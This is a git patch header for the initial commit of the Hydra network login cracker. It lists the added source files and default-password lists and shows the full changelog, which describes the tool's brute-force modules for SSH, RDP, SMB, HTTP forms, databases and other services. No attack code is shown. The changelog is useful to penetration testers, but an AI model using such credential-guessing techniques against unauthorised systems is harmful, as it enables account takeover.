From 6a94f708e894d0bf9ab8624e7d247de36b67ae2d Mon Sep 17 00:00:00 2001 From: "U-marc-win4\\marc" Date: Thu, 24 Apr 2014 16:49:18 +0200 Subject: [PATCH] initial commit --- CHANGES | 700 +++ INSTALL | 11 + LICENSE | 683 +++ LICENSE.OPENSSL | 170 + Makefile | 5 + Makefile.am | 73 + Makefile.orig | 5 + Makefile.unix | 2 + README | 229 + bfg.c | 204 + bfg.h | 53 + configure | 1064 +++++ crc32.c | 103 + crc32.h | 8 + d3des.c | 469 ++ d3des.h | 56 + dpl4hydra.sh | 187 + dpl4hydra_full.csv | 8807 ++++++++++++++++++++++++++++++++++++ dpl4hydra_local.csv | 8807 ++++++++++++++++++++++++++++++++++++ hmacmd5.c | 135 + hmacmd5.h | 40 + hydra-afp.c | 184 + hydra-asterisk.c | 137 + hydra-cisco-enable.c | 207 + hydra-cisco.c | 198 + hydra-cvs.c | 151 + hydra-firebird.c | 160 + hydra-ftp.c | 188 + hydra-gtk/AUTHORS | 0 hydra-gtk/COPYING | 340 ++ hydra-gtk/ChangeLog | 0 hydra-gtk/INSTALL | 182 + hydra-gtk/Makefile.am | 30 + hydra-gtk/Makefile.in | 382 ++ hydra-gtk/NEWS | 0 hydra-gtk/README | 19 + hydra-gtk/acconfig.h | 7 + hydra-gtk/aclocal.m4 | 363 ++ hydra-gtk/autogen.sh | 159 + hydra-gtk/config.h | 33 + hydra-gtk/config.h.in | 32 + hydra-gtk/configure | 5203 +++++++++++++++++++++ hydra-gtk/configure.in | 22 + hydra-gtk/install-sh | 251 + hydra-gtk/make_xhydra.sh | 20 + hydra-gtk/missing | 198 + hydra-gtk/mkinstalldirs | 40 + hydra-gtk/src/Makefile.am | 17 + hydra-gtk/src/Makefile.in | 319 ++ hydra-gtk/src/callbacks.c | 682 +++ hydra-gtk/src/callbacks.h | 27 + hydra-gtk/src/interface.c | 1110 +++++ hydra-gtk/src/interface.h | 6 + hydra-gtk/src/main.c | 84 + hydra-gtk/src/support.c | 120 + hydra-gtk/src/support.h | 45 + hydra-gtk/stamp-h.in | 1 + hydra-gtk/xhydra.glade | 2731 +++++++++++ hydra-gtk/xhydra.gladep | 10 + hydra-http-form.c | 691 +++ hydra-http-post-attack.txt | 30 + hydra-http-proxy-urlenum.c | 288 ++ hydra-http-proxy.c | 270 ++ hydra-http.c | 318 ++ hydra-icq.c | 256 ++ hydra-imap.c | 576 +++ hydra-irc.c | 218 + hydra-ldap.c | 452 ++ hydra-logo.ico | Bin 0 -> 38078 bytes hydra-logo.rc | 1 + hydra-mod.c | 1278 ++++++ hydra-mod.h | 61 + hydra-mssql.c | 168 + hydra-mysql.c | 429 ++ hydra-ncp.c | 197 + hydra-nntp.c | 475 ++ hydra-oracle-listener.c | 339 ++ hydra-oracle-sid.c | 151 + hydra-oracle.c | 191 + hydra-pcanywhere.c | 286 ++ hydra-pcnfs.c | 198 + hydra-pop3.c | 771 ++++ hydra-postgres.c | 133 + hydra-rdp.c | 3210 +++++++++++++ hydra-redis.c | 103 + hydra-rexec.c | 110 + hydra-rlogin.c | 149 + hydra-rsh.c | 122 + hydra-s7-300.c | 303 ++ hydra-sapr3.c | 132 + hydra-sip.c | 303 ++ hydra-smb.c | 1431 ++++++ hydra-smtp-enum.c | 264 ++ hydra-smtp.c | 451 ++ hydra-snmp.c | 580 +++ hydra-socks5.c | 180 + hydra-ssh.c | 198 + hydra-sshkey.c | 166 + hydra-svn.c | 206 + hydra-teamspeak.c | 141 + hydra-telnet.c | 219 + hydra-vmauthd.c | 157 + hydra-vnc.c | 244 + hydra-wizard.sh | 44 + hydra-xmpp.c | 494 ++ hydra.1 | 120 + hydra.c | 3700 +++++++++++++++ hydra.h | 130 + libpq-fe.h | 410 ++ ntlm.c | 1445 ++++++ ntlm.h | 146 + performance.h | 72 + postgres_ext.h | 69 + pw-inspector-logo.rc | 1 + pw-inspector.1 | 57 + pw-inspector.c | 164 + pw-inspector.ico | Bin 0 -> 38078 bytes rdp.h | 631 +++ sasl.c | 716 +++ sasl.h | 50 + xhydra.1 | 31 + xhydra.jpg | Bin 0 -> 76954 bytes 122 files changed, 60195 insertions(+) create mode 100644 CHANGES create mode 100755 INSTALL create mode 100755 LICENSE create mode 100755 LICENSE.OPENSSL create mode 100644 Makefile create mode 100644 Makefile.am create mode 100644 Makefile.orig create mode 100644 Makefile.unix create mode 100644 README create mode 100644 bfg.c create mode 100644 bfg.h create mode 100755 configure create mode 100644 crc32.c create mode 100644 crc32.h create mode 100644 d3des.c create mode 100644 d3des.h create mode 100755 dpl4hydra.sh create mode 100755 dpl4hydra_full.csv create mode 100755 dpl4hydra_local.csv create mode 100644 hmacmd5.c create mode 100644 hmacmd5.h create mode 100644 hydra-afp.c create mode 100644 hydra-asterisk.c create mode 100644 hydra-cisco-enable.c create mode 100644 hydra-cisco.c create mode 100644 hydra-cvs.c create mode 100644 hydra-firebird.c create mode 100644 hydra-ftp.c create mode 100755 hydra-gtk/AUTHORS create mode 100755 hydra-gtk/COPYING create mode 100755 hydra-gtk/ChangeLog create mode 100755 hydra-gtk/INSTALL create mode 100755 hydra-gtk/Makefile.am create mode 100755 hydra-gtk/Makefile.in create mode 100755 hydra-gtk/NEWS create mode 100755 hydra-gtk/README create mode 100755 hydra-gtk/acconfig.h create mode 100755 hydra-gtk/aclocal.m4 create mode 100755 hydra-gtk/autogen.sh create mode 100755 hydra-gtk/config.h create mode 100755 hydra-gtk/config.h.in create mode 100755 hydra-gtk/configure create mode 100755 hydra-gtk/configure.in create mode 100755 hydra-gtk/install-sh create mode 100755 hydra-gtk/make_xhydra.sh create mode 100755 hydra-gtk/missing create mode 100755 hydra-gtk/mkinstalldirs create mode 100755 hydra-gtk/src/Makefile.am create mode 100755 hydra-gtk/src/Makefile.in create mode 100755 hydra-gtk/src/callbacks.c create mode 100755 hydra-gtk/src/callbacks.h create mode 100755 hydra-gtk/src/interface.c create mode 100755 hydra-gtk/src/interface.h create mode 100755 hydra-gtk/src/main.c create mode 100755 hydra-gtk/src/support.c create mode 100755 hydra-gtk/src/support.h create mode 100755 hydra-gtk/stamp-h.in create mode 100755 hydra-gtk/xhydra.glade create mode 100755 hydra-gtk/xhydra.gladep create mode 100644 hydra-http-form.c create mode 100755 hydra-http-post-attack.txt create mode 100644 hydra-http-proxy-urlenum.c create mode 100644 hydra-http-proxy.c create mode 100644 hydra-http.c create mode 100644 hydra-icq.c create mode 100644 hydra-imap.c create mode 100644 hydra-irc.c create mode 100644 hydra-ldap.c create mode 100644 hydra-logo.ico create mode 100644 hydra-logo.rc create mode 100644 hydra-mod.c create mode 100644 hydra-mod.h create mode 100644 hydra-mssql.c create mode 100644 hydra-mysql.c create mode 100644 hydra-ncp.c create mode 100644 hydra-nntp.c create mode 100644 hydra-oracle-listener.c create mode 100644 hydra-oracle-sid.c create mode 100644 hydra-oracle.c create mode 100644 hydra-pcanywhere.c create mode 100644 hydra-pcnfs.c create mode 100644 hydra-pop3.c create mode 100644 hydra-postgres.c create mode 100644 hydra-rdp.c create mode 100644 hydra-redis.c create mode 100644 hydra-rexec.c create mode 100644 hydra-rlogin.c create mode 100644 hydra-rsh.c create mode 100644 hydra-s7-300.c create mode 100644 hydra-sapr3.c create mode 100644 hydra-sip.c create mode 100644 hydra-smb.c create mode 100644 hydra-smtp-enum.c create mode 100644 hydra-smtp.c create mode 100644 hydra-snmp.c create mode 100644 hydra-socks5.c create mode 100644 hydra-ssh.c create mode 100644 hydra-sshkey.c create mode 100644 hydra-svn.c create mode 100644 hydra-teamspeak.c create mode 100644 hydra-telnet.c create mode 100644 hydra-vmauthd.c create mode 100644 hydra-vnc.c create mode 100755 hydra-wizard.sh create mode 100644 hydra-xmpp.c create mode 100644 hydra.1 create mode 100644 hydra.c create mode 100644 hydra.h create mode 100644 libpq-fe.h create mode 100644 ntlm.c create mode 100644 ntlm.h create mode 100644 performance.h create mode 100644 postgres_ext.h create mode 100644 pw-inspector-logo.rc create mode 100644 pw-inspector.1 create mode 100644 pw-inspector.c create mode 100644 pw-inspector.ico create mode 100644 rdp.h create mode 100644 sasl.c create mode 100644 sasl.h create mode 100644 xhydra.1 create mode 100755 xhydra.jpg diff --git a/CHANGES b/CHANGES new file mode 100644 index 0000000..ef58eb3 --- /dev/null +++ b/CHANGES @@ -0,0 +1,700 @@ +Changelog for hydra +------------------- + +Release 7.7 +* Added module for redis (submitted by Alejandro Ramos, thanks!) +* Added patch which adds Unicode support for the SMB module (thanks to Max Kosmach") +* Added initial interactive password authentication test for ssh (thanks to Joshua Houghton for submitting) +* Bugfixes for -x option: + - password tries were lost when connection errors happened (thanks to Vineet Kumar for reporting) + - fixed crash when used together with -e option +* Fixed a bug that hydra would not compile without libssh (introduced in v7.6) +* Cygwin's Postgresql is working again, hence configure detection re-enabled +* Added gcc compilation security options (if detected to be supported by configure script) +* Enhancements to the secure compilation options +* Checked code with cppcheck and fixed some minor issues. surprised it were so few and unlikely stuff :-) + + +Release 7.6 +* Added a wizard script for hydra based on a script by Shivang Desai +* Added module for Siemens S7-300 (submitted by Alexander Timorin and Sergey Gordeychik, thanks!) +* HTTP HEAD/GET: MD5 digest auth was not working, fixed (thanks to Paul Kenyon) +* SMTP Enum: HELO is now always sent, better 500 error detection +* hydra main: + - fixed a bug in the IPv6 address parsing when a port was supplied + - added info message for pop3, imap and smtp protocol usage +* hydra GTK: missed some services, added +* dpl4hydra.sh: + - added Siemens S7-300 common passwords to default password list + - more broad searching in the list +* Performed code indention on all C files :-) +* Makefile patch to ensure .../etc directory is there (thanks to vonnyfly) + + +Release 7.5 +* Moved the license from GPLv3 to AGPLv3 (see LICENSE file) +* Added module for Asterisk Call Manager +* Added support for Android where some functions are not available +* hydra main: + - reduced the screen output if run without -h, full screen with -h + - fix for IPv6 and port parsing with service://[ipv6address]:port/OPTIONS + - fixed -o output (thanks to www417) + - warning if HYDRA_PROXY is defined but the module does not use it + - fixed an issue with large input files and long entries +* hydra library: + - SSL connections are now fixed to SSLv3 as some SSL servers fail otherwise, report if this gives you problems + - removed support for old OPENSSL libraries +* HTTP Form module: + - login and password values are now encoded if special characters are present + - ^USER^ and ^PASS^ are now also supported in H= header values + - if you the colon as a value in your option string, you can now escape it with \: - but do not encode a \ with \\ +* Mysql module: protocol 10 is now supported +* SMTP, POP3, IMAP modules: Disabled the TLS in default. TLS must now be + defined as an option "TLS" if required. This increases performance. +* Cisco module: fixed a small bug (thanks to Vitaly McLain) +* Postgres module: libraries on Cygwin are buggy at the moment, module is therefore + disabled on Cygwin + + +Release 7.4.3 FIX RELEASES for bugs introduced in 7.4 +* Quickfix for people who do not have libssh installed (won't compile otherwise) +* Quickfix for http-get/http-head and irc module which would not run due a new feature. +* Fix for the ssh module that breaks an endless loop if a service becomes unavailable (thanks to shark0der(at)gmail(dot)com for reporting) + + +Release 7.4 +* New module: SSHKEY - for testing for ssh private keys (thanks to deadbyte(at)toucan-system(dot)com!) +* Added support for win8 and win2012 server to the RDP module +* Better target distribution if -M is used +* Added colored output (needs libcurses) +* Better library detection for current Cygwin and OS X +* Fixed the -W option +* Fixed a bug when the -e option was used without -u, -l, -L or -C, only half of the logins were tested +* Fixed HTTP Form module false positive when no answer was received from the server +* Fixed SMB module return code for invalid hours logon and LM auth disabled +* Fixed http-{get|post-form} from xhydra +* Added OS/390 mainframe 64bit support (thanks to dan(at)danny(dot)cz) +* Added limits to input files for -L, -P, -C and -M - people were using unhealthy large files! ;-) +* Added debug mode option to usage (thanks to Anold Black) + + +Release 7.3 +* Hydra main: + - Added -F switch to quit all targets if one pair was found (for -M) + - Fixed a bug where hydra would terminate after reporting a successful + login when an account would accept any password + - Fixed a bug with very large wordlists (thanks to sheepdestroyer for reporting!) + - Enhanced the module help +* configure script: + - Added fix Oracle library inclusion, thanks to Brandon Archer! + - Added --nostrip option to prevent binary stripping (requested by Fedora + maintainer) +* Added a Makefile patch by the Debian maintainers to support their + SecurityHardeningBuildFlags for the wheezy build as requested +* dpl4hydra: added install directory support +* All code: message cleanups +* SNMP module + - originally already supported write and v2 although this was not in the + module help output. Added :-) + - added SNMPv3 MD5/SHA1 authentication support, though beta still +* HTTP module: + - fixed HTTP NTLM auth session + - implemented errata fix for HTTP digest md5-sess algorithm + - set default path to / +* HTTP Form module: + - set default path to / + - support HTTP/1.0 redirects + - fix failed condition check when pcre is not used +* IMAP module: fixed auth detection +* POP3 module: Updated auth and capability detection +* Oracle module: fixed bad handling +* Oracle listener module: fixed hash size handling +* Telnet/Cisco/Cisco-enable modules: support "press ENTER" prompts +* FTP module: + - Fixed a bug where 530 messages were incorrectly handled + - Clarification for the usage of ftps +* Mysql module: added patch from Redhat/Fedora that fixes compile problems +* Added IDN and PCRE support for Cygwin + + +Release 7.2 +* Speed-up http modules auth mechanism detection +* Fixed -C colonfile mode when empty login/passwords were used (thanks to + will(at)configitnow(dot)com for reporting) +* The -f switch was not working for postgres, afp, socks5, firebird and ncp, + thanks to Richard Whitcroft for reporting! +* Fixed NTLM auth in http-proxy/http-proxy-url module +* Fixed URL when being redirected in http-form module, thanks to gash(at)chaostreff(dot)at +* Fix MSSQL success login condition, thanks to whistle_master(at)live(dot)com +* Fix http form module: optional headers and 3xx status redirect, thx to Gash +* Fix in configure script for --prefix option, thanks to dazzlepod +* Update of the dpl4hydra script by Roland Kessler, thanks! +* Small fix for hydra man page, thanks to brad(at)comstyle(dot)com + + +Release 7.1 +* Added HTTP Proxy URL enumeration module +* Added SOCKS4/SOCKS5 proxy support with authentication +* Added IPv6 support for SOCKS5 module +* Added -e r option to try the reversed login as password +* Rewrote -x functionality as the code caused too much trouble (thanks to + murder.net7(at)gmail.com for reporting one of the issues) +* Fixed a bug with multiple hosts (-M) and http modules against targets that + are virtual servers. Well spotted by Tyler Krpata! +* Fixed SVN IPv6 support and updated deprecated calls +* Fixed RDP failed child connection returned value and false positive issues + reported by Wangchaohui, thanks! +* Fixed restore file functionality, was not working together with -o option +* Fix in http-form module for bug introduced in 7.0 +* Fixed xhydra specific parameter value for http-proxy module +* minor enhancements + + +Release 7.0 +* New main engine for hydra: better performance, flexibility and stability +* New option -u - loop around users, not passwords +* Option -e now also works with -x and -C +* Added RDP module, domain can be passed as argument +* Added other_domain option to smb module to test trusted domains +* Small enhancement for http and http-proxy module for standard ignoring servers +* Lots of bugfixes, especially with many tasks, multiple targets and restore file +* Fixes for a few http-form issues +* Fix smb module NTLM hash use +* Fixed Firebird module deprecated API call +* Fixed for dpl4hydra to work on old sed implementations (OS/X ...) +* Fixed makefile to install dpl4hydra (thx @sitecrea) +* Fixed local buffer overflow in debug output function (required -d to be used) +* Fixed xhydra running warnings and correct quit action event + + +Release 6.5 +* Improved HTTP form module: getting cookie, fail or success condition, follow + multiple redirections, support cookie gathering URL, multiple user defined + headers +* Added interface support for IPv6, needed for connecting to link local fe80:: + addresses. Works only on Linux and OS/X. Information for Solaris and *BSD welcome +* Added -W waittime between connects option +* The -x bruteforce mode now allows for generated password amounts > 2 billion +* Fix if -L was used together with -x +* Fixes for http- modules when the http-...://target/options format was used +* Fixed a bug in the restore file write function that could lead to a crash +* Fixed XMPP module jabber init request and challenge response check, thx "F e L o R e T" +* Fix: if a proxy was used, unresolveable targets were disabled. now its fine +* Fix for service://host/ usage if a colon was used after the URI without a + port defined + + +Release 6.4 +* Update SIP module to extract and use external IP addr return from server error to bypass NAT +* Update SIP module to use SASL lib +* Update email modules to check clear mode when TLS mode failed +* Update Oracle Listener module to work with Oracle DB 9.2 +* Update LDAP module to support Windows 2008 active directory simple auth +* Fix to the connection adaptation engine which would loose planned attempts +* Fix make script for CentOS, reported by ya0wei +* Print error when a service limits connections and few pairs have to be tested +* Improved Mysql module to only init/close when needed +* Added patch from the FreeBSD maintainers +* Module usage help does not need a target to be specified anymore +* Configure script now honors /etc/ld.so.conf.d/ directory +* Add more SMB dialects + + +Release 6.3 +* Added patch by Petar(dot)Kaley(at)gmail.com which adds nice icons to cygwin hydra files +* Added patch by Gauillaume Rousse which fixes a warning display +* New Oracle module (for databases via OCI, for TNS Listener passwd, for SID enumeration) +* New SMTP user enum module (using VRFY, EXPN or RCPT command) +* Memory leak fix for -x bruteforcing option reported by Alex Lau +* Fix for svn module, for some versions it needs one more lib, thanks to the + Debian team for reporting! +* Fix ssh module, on connection refused a credential could be lost +* Fix http-form module, a redirect was not always followed +* QA on all modules for memory leaks +* Better gtk detection (to not even try xhydra compilation when its useless) +* First blant attempt for configuring to x64 systems (Linux and *BSD) +* Updated network password cracker comparison on the web page (for hydra and new ncrack) +* Indented all source code + + +Release 6.2 +* Added a patch by Jan Dlabal which adds password generation bruteforcing (no more password files :-) ) +* Forgot to rename ssh2 to ssh in xhydra, fixed +* Add support for CRAM-MD5 and DIGEST-MD5 auth to ldap module +* Fix SASL PLAIN auth method issue +* Add TLS negotiation support for smtp-auth, pop3, imap, ftp and ldap +* Added man pages from Debian maintainers +* Checked Teamspeak module, works on TS2 protocol +* Add support for SCRAM-SHA1 (RFC 5802), first auth cracker to support it, yeah ! +* New module: XMPP with TLS negotiation and LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5, SCRAM-SHA1 support +* Add SCRAM-SHA1 auth to IMAP module +* Add module usage help (-U) +* Add support for RFC 4013: Internationalized Strings in SASL ("SASLPrep") +* Rename smtpauth module to smtp +* Add SASL + TLS support for NNTP +* Bugfix SASL DIGEST-MD5, response could be wrong sometime, mainly on 64bits systems +* Bugfix rlogin module, some auth failure could not be detected accurately +* Bugfix rsh module, some auth failure could not be detected accurately +* New module: IRC is not dead ! use to find general server password and /oper credential +* Add SSL support for VMware Authentication Daemon module +* Bugfix CVS module, should work now, why does nobody report this ?? +* Bugfix Telnet module, when line mode is not available +* Add support for new syntax ://[:][/] +* Add TLS support for SIP +* STILL OPEN: Fixed a problem in hydra where a login+pw test was lost when an arm/child was quitting + + +Release 6.1 +* More license updates for the files for the Debian guys +* Fix for the configure script to correctly detect postgresql +* Add checks for libssh v0.4 and support for ssh v1 +* Merge all latest crypto code in sasl files +* Fix SVN compilation issue on openSUSE (tested with v11.3) + + +Release 6.0 +* Added GPL exception clause to license to allow linking to OpenSSL - Debian people need this +* IPv6 support finally added. Note: sip and socks5 modules do not support IPv6 yet +* Changes to code and configure script to ensure clean compile on Solaris 11, + OSX, FreeBSD 8.1, Cygwin and Linux +* Bugfix for SIP module, thanks to yori(at)counterhackchallenges(dot)com +* Compile fixes for systems without OpenSSL or old OpenSSL installations +* Eliminated compile time warnings +* xhydra updates to support the new features (david@) +* Added CRAM-MD5, DIGEST-MD5 auth mechanism to the smtp-auth module (david@) +* Added LOGIN, PLAIN, CRAM-(MD5,SHA1,SHA256) and DIGEST-MD5 auth mechanisms to the imap and pop3 modules (david@) +* Added APOP auth to POP3 module (david@) +* Added NTLM and DIGEST-MD5 to http-auth module and DIGEST-MD5 to http-proxy module (david@) +* Fixed VNC module for None and VLC auth (david@) +* Fixes for LDAP module (david@) +* Bugfix Telnet module linemode option negotiation using win7 (david@) +* Bugfix SSH module when max auth connection is reached (david@) + + +Release 5.9 +* Update for the subversion module for newer SVN versions (thanks to David Maciejak @ GMAIL dot com) +* Another patch by David to add the PLAIN auth mechanism to the smtp-auth module +* mysql module now has two implementations and uses a library when found (again + thanks to David Maciejak @ GMAIL dot com - what would hydra be without him) +* camiloculpian @ gmail dot com submitted a logo for hydra - looks cool, thanks! +* better FTP 530 error code detection +* bugfix for the SVN module for non-standard ports (again david@) + + +Release 5.8 +* Added Apple Filing Protocol (thank to "never tired" David Maciejak @ GMAIL dot com) +* Fixed a big bug in the SSL option (-S) + + +Release 5.7 +* Added ncp support plus minor fixes (by David Maciejak @ GMAIL dot com) +* Added an old patch to fix a memory from SSL and speed it up too from kan(at)dcit.cz +* Removed unnecessary compiler warnings +* Enhanced the SSH2 module based on an old patch from aris(at)0xbadc0de.be +* Fixed small local defined overflow in the teamspeak module. Does it still work anyway?? + + +Release 5.6 PRIVATE VERSION +########### +* Moved to GPLv3 License (lots of people wanted that) +* Upgraded ssh2 module to libssh-0.4.x (thanks to aris (at) 0xbadc0de.be for + the 0.2 basis) +* Added firebird support (by David Maciejak @ GMAIL dot com) +* Added SIP MD5 auth patch (by Jean-Baptiste Aviat 100 +! Soon to come: v5.0 - some cool new features to arrive on your pentest + machine! + + +Release 4.6 +########### +* Snakebyte delivered a module for Teamspeak +* Snakebyte updated the rexec module for the Hydra Palm version +* Snakebyte updated xhydra to support the new Telnet success response option +* Clarified the Licence +* Updated the ldap module to support v3, note that "ldap" is now specified as + "ldap2" or "ldap3". Added wrong version detection. + + +Release 4.5 +########### +* The configure script now detects Cygwin automatically :-) +* The telnet module now handles the OPT special input. Specify the string + which is displayed after successfully a login. Use this if you have false + positives. +* Made smtp-auth module more flexible in EHLO/HELO handling +* Fixed some glitches in the SAP/R3 module (correct sysnr, better port + handling) thanks to ngregoire@exaprobe.com ! +* Fixed some glitches in the http/https module +* Fixed a big bug in snakebyte's snmp module +* Warning msg is now displayed if the deprecated icq module is used +* Added warning message to the ssh2 module during compilation as many people + use the newest libssh version which is broken. + + +Release 4.4 +########### +* Fixed another floating point exception *sigh* +* Fixed -C colon mode +* Added EHLO support for the smtp-auth module, required for some smtpd + + +Release 4.3 +########### +* Fixed a divide by zero bug in the status report function +* Added functionality for skipping accounts (cvs is so nice to report this) +* Snakebyte sent in a patch for cvs for skipping nonexisting accounts +* sent in a patch to fix proxy support for the HTTP module + without proxy authentication + + +Release 4.2 +########### +* Snakebyte sent in modules for SNMP and CVS - great work! +* Snakebyte also expanded the gtk gui to support the two new modules +* Justin sent in a module for smtp-auth ... thanks! +* master_up@post.cz sent in some few patches to fix small glitches +* Incorporated a check from the openbsd port + + +Release 4.1 +########### +* Snakebyte wrote a very nice GTK GUI for hydra! enjoy! +* due a bug, sometimes hydra would kill process -1 ... baaaad boy! +* found passwords are now also printed to stdout if -o option is used +* reported that hydra wouldn't complain on ssh2 option if + compiled without support, fixed +* made an official port for FreeBSD and sent me a + diff to exchange the MD4 of libdes to openssl +* noticed that hydra will crash on big wordlists as + the result of the mallocs there were not checked, fixed +* Snakebyte expanded his PalmOS Version of hydra to nntp and fixed vnc +* Increased the wait time for children from 5 to 15 seconds, as e.g. + snakebyte reported detection problems +* Fixed some display glitches + + +Release v4.0 +############ +# +# This is a summary of changes of the D1 to D5 beta releases and shows +# what makes v4.0 different from 3.1. +# Have fun. Lots of it. +# +# By the way: I need someone to program a nice GTK frontend for hydra, +# would YOU like to do that and receive the fame? Send an email to vh@thc.org ! +# +* For the first time there is not only a UNIX/source release but additionally: + ! Windows release (cygwin compile with dll's) + ! PalmPilot release + ! ARM processor release (for all your Zaurus, iPaq etc. running Linux) +* There are new service attack modules: + ! ms-sql + ! sap r/3 (requires a library) + ! ssh v2 (requires a library) +* Enhancements/Fixes to service attack modules: + ! vnc module didnt work correctly, fixed + ! mysql module supports newer versions now + ! http module received a minor fix and has better virtual host support now + ! http-proxy supports now an optional URL + ! socks5 checks now for false positives and daemons without authentication +* The core code (hydra.c) was rewritten from scratch + ! rewrote the internal distribution functions from scratch. code is now + safer, less error prone, easier to read. + ! multiple target support rewritten which now includes intelligent load + balancing based on success, error and load rate + ! intelligently detect maximum connect numbers for services (per server if + multiple targets are used) + ! intelligent restore file writing + ! Faster (up to 15%) + ! Full Cygwin and Cygwin IPv6 support +* added new tool: pw-inspector - it can be used to just try passwords which + matches the target's password policy +# +# This should be more than enough! :-) +# + +... the rest below is history ... + +########################################################################### +# +# New Hydra v4.0 code branch +# +Release D5 +* added patches by kan@dcit.cz which enhance the proxy module and provide + a small fix for the http module +* small beautifcations to make the compiler happy +! This is the final beta version before public release + - please test everything! + +Release D4 +* Tick made an update to his configure-arm +* snakebyte@gmx.de added imap, vnc and cisco module support to PalmPilot +* fixed VNC module +* enhanced mysql module to work also with 4.0.x (and all future protocol 10 + mysql protocol types) +* enhanced socks5 module to identify daemons which do not require + authentication, and false positive check (otherwise dante would report all + tries as successful) +* fixed a bug in configure for D3 which resulted in compile problems on + several platforms requiring libcrypto + +Release D3 +* added sapr3 attack module (requires libsdk.a and saprfc.h) +* added ssh2 attack module (requires libssh) +* snakebyte@gmx.de added telnet module support for PalmPilot +* fixed the mssql module, should work now +* fixed -e option bug +* fixed -C option bug (didnt work at all!!) +* fixed double detection (with -e option) plus added simple dictionary + double detection +* target port is now displayed on start + +Release D2 +* added better virtual host support to the www/http/https/ssl module + (based on a patch from alla@scanit.be) +* added ARM support (does not work for libdes yet, ssl works), done by + Tick +* added Palm support (well, in reality it is more a rewrite which can use + the hydra-modules), done by snakebyte +* added ms-sql attack module (code based on perl script form HD Moore + , thanks for contributing) + +Release D1 (3 March 2003) +* rewrote the internal distribution functions from scratch. code is now + safer, less error prone, easier to read. +* multiple target support rewritten which now includes intelligent load + balancing based on success, error and load rate +* intelligently detect maximum connect numbers for services (per server if + multiple targets are used) +* intelligent restore file writing +* Faster (up to 15%) +* Full Cygwin and Cygwin IPv6 support +* added new tool: pw-inspector - it can be used to just try passwords which + matches the target's password policy + +########################################################################### + +v3.0 (FEBRUARY 2004) PUBLIC RELEASE +* added a restore function to enable you to continue aborted/crashed + sessions. Just type "hydra -R" to continue a session. + NOTE: this does not work with the -M option! This feature is then disabled! +* added a module for http proxy authentication cracking ("http-proxy") :-) +* added HTTP and SSL/CONNECT proxy support. SSL/CONNECT proxy support works + for *all* TCP protocols, you just need to find a proxy which allows you to + CONNECT on port 23 ... + The environment variable HYDRA_PROXY_HTTP defines the web proxy. The + following syntax is valid: HYDRA_PROXY_HTTP="http://123.45.67.89:8080/" + Same for HYDRA_PROXY_CONNECT. + If you require authentication for the proxy, use the HYDRA_PROXY_AUTH + environment variable: + HYDRA_PROXY_AUTH="login:password" +* fixed parallel host scanning engine (thanks to m0j0.j0j0 for reporting) +* A status, speed and time to completion report is now printed every minute. +* finally updated the README + +v2.9 (FEBRUARY 2004) PRIVATE RELEASE +... + +v2.8 (JANUARY 2004) PRIVATE RELEASE +... + +v2.7 (JANUARY 2004) PUBLIC RELEASE +* small fix for the parallel host code (thanks to m0j0@foofus.net) + +v2.6 (DECEMBER 2003) PUBLIC RELEASE +* fixed a compiling problem for picky compilers. + +v2.5 (NOVEMBER 2003) PUBLIC RELEASE +* added a big patch from m0j0@foofus.net which adds: + - AAA authentication to the cisco-enable module + - Running the attacks on hosts in parallel + - new smbnt module, which uses lanman hashes for authentication, needs libdes + ! great work and thanks ! +* changed code to compile easily on FreeBSD +* changed configure to compile easily on MacOS X - Panther (cool OS btw ...) + +v2.4 (AUGUST 2003) PUBLIC RELEASE +* public release +=== 2.3 stuff=== +* added mysql module (thanks to mcbethh@u-n-f.com) +* small fix in vnc (thanks to the Nessus team) +* added credits for vnc-module (FX/Phenolite) +* new ./configure script for better Solaris and *BSD support (copied from amap) +* updated to new email/www addresses => www.thc.org + +v2.2 (OCTOBER 2002) PUBLIC RELEASE +* fixed a bug in the -P passwordfile handling ... uhhh ... thanks to all + the many people who reported that bug! +* added check if a password in -P passwordfile was already done via the + -e n|s switch + +v2.1 (APRIL 2002) PUBLIC RELEASE +* added ldap cracking mode (thanks to myself, eh ;-) +* added -e option to try null passwords ("-e n") and passwords equal to the + login ("-e s"). When specifying -e, -p/-P is optional (and vice versa) +* when a login is found, hydra will now go on with the next login + +v2.0 (APRIL 2002) PRIVATE RELEASE +! with v1.1.14 of Nessus, Hydra is a Nessus plugin! +* incorporated code to make hydra a nessus plugin (thanks to deraison@cvs.nessus.org !) +* added smb/samba/CIFS cracking mode (thanks to deraison@cvs.nessus.org !) +* added cisco-enable cracking mode (thanks to J.Marx@secunet.de !) +* minor enhancements and fixes + +v1.7 (MARCH 2002) PRIVATE RELEASE +* configure change to better detect OpenSSL +* ported to Solaris + +v1.6 (FEBRUARY 2002) PUBLIC RELEASE +* added socks5 support (thanks to bigbud@weed.tc !) + +v1.5 (DECEMBER 2001) PRIVATE RELEASE +* added -S option for SSL support (for all TCP based protocols) +* added -f option to stop attacking once a valid login/pw has been discovered +* made modules more hydra-mod compliant +* configure stuff thrown out - was not really used and too complicated, + wrote my own, lets hope it works everywhere ;-) + +v1.4 (DECEMBER 2001) PUBLIC RELEASE +* added REXEC cracking module +* added NNTP cracking module +* added VNC cracking module (plus the 3DES library, which is needed) - some + of the code ripped from FX/Phenolite :-) thanks a lot +* added PCNFS cracking module +* added ICQ cracking module (thanks to ocsic !!) +* for the pcnfs cracking module, I had to add the hydra_connect_udp function +* added several compactibility stuff to work with all the M$ crap + +v1.3 (September 2001) PUBLIC RELEASE +* uh W2K telnetd sends null bytes in negotiation mode. workaround implemented. +* Rewrote the finish functions which would sometimes hang. Shutdowns are faster + now as well. +* Fixed the line count (it was always one to much) +* Put more information in the outpufile (-o) +* Removed some configure crap. + +v1.2 (August 2001) PRIVATE RELEASE +* Fixed a BIG bug which resulted in accounts being checked serveral times. ugh +* Fixed the bug which showed the wrong password for a telnet hack. Works for + me. please test. +* Added http basic authentication cracking. Works for me. please test. +* Fixed the ftp cracker module for occasions where a long welcome message was + displayed for ftp. +* Removed some compiler warnings. + +v1.1 (May 2001) PUBLIC RELEASE +* Added wait+reconnect functionality to hydra-mod +* Additional wait+reconnect for cisco module +* Added small waittimes to all attack modules to prevent too fast reconnects +* Added cisco Username/Password support to the telnet module +* Fixed a deadlock in the modules, plus an additional one in the telnet module + +v1.0 (April 2001) PUBLIC RELEASE +* Verified that all service modules really work, no fix necessary ;-) + ... so let's make it public +* Changed the LICENCE + +v0.6 (April 2001) PRIVATE RELEASE +* Added hydra-cisco.c for the cisco 3 times "Password:" type +* Added hydra-imap.c for the imap service +* Fixed a bug in hydra-mod.c: empty logins resulted in an empty + hydra_get_next_password() 